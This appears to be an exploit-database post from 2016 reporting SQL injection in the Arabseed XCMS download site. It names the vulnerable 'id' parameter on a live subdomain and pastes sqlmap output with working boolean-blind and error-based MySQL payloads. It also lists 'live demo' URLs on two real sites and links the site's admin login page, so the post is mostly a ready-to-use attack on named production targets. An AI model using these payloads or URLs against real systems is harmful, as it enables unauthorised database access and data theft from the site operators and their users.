Arabseed XCMS V1.0.9 SQL injection Vulnerability

2016.09.07
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Arabseed XCMS V1.0.9 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://arabseed.com/ # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 07/09/2016 # video Proof : https://youtu.be/ABNSN3XecHw ###################### # [★] DESCRIPTION : ###################### # [+] Arabseed is an Download Website | Movies,Tv show,Songs And Forums . # [+] Arabseed is an Famous Webiste in Arabic Country's # [+] AND an SQL injection has been Detected in his subdomain : wn.arabseed.com ###################### # [★] Poc : ###################### # When You want to Download Any Thing From the Website You Will Notice a Redirection to the # Subdomain : http://wn.arabseed.com/m1.php?id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://wn.arabseed.com/m1.php?id=2358249' ###################### # [★] SQLmap PoC: ###################### # GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N # sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests: # --- #Parameter: id (GET) # Type: boolean-based blind # Title: MySQL >= 5.0 boolean-based blind - Parameter replace # Payload: id=(SELECT (CASE WHEN (4787=4787) THEN 4787 ELSE 4787*(SELECT 4787 FROM # INFORMATION_SCHEMA.CHARACTER_SETS) END)) # # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: id=2358249 AND (SELECT 4091 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT ( # ELT(4091=4091,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # --- # # --- # GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [★] Live Demo : ###################### # http://wn.arabseed.com/m1.php?id=2358249 # http://wwenews.us/m1.php?id=298733 ###################### # [★] Admin Dashboard : ###################### # http://www.arabseed.com/ar/user/auth/login.html ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/ABNSN3XecHw


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top